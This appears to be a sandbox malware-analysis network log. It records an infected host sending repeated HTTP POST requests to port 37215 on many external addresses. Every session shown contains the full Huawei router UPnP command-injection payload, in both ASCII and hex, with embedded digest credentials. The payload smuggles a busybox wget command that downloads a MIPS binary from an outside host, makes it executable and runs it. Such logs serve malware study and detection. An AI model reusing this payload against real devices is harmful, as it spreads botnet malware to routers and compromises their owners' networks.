                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            35192.168.2.145496641.145.71.13937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661523104 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            36192.168.2.143810441.198.161.14537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661573887 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            37192.168.2.143396641.17.142.4437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661612034 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            38192.168.2.145198041.161.125.21137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661622047 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            39192.168.2.143503841.83.153.15037215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661650896 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            40192.168.2.1437936197.45.165.23437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661690950 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            41192.168.2.1457034197.224.78.6437215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661710024 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            42192.168.2.145521041.21.0.8937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661731958 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            43192.168.2.1455782197.172.100.11737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661761999 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            44192.168.2.1446730156.44.219.20637215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661782980 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            45192.168.2.1439392156.70.90.4737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.661802053 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
